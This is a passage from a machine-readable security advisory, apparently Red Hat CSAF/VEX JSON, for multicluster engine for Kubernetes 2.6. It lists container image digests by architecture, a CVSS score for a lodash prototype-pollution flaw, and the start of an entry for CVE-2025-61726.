2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "lodash: prototype pollution in _.unset and _.omit functions"}, {"cve": "CVE-2025-61726", "cwe": {"id": "CWE-770", "name": "Allocation of Resources Without Limits or Throttling"}, "discovery_date": "2026-01-28T20:01:42.791305+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 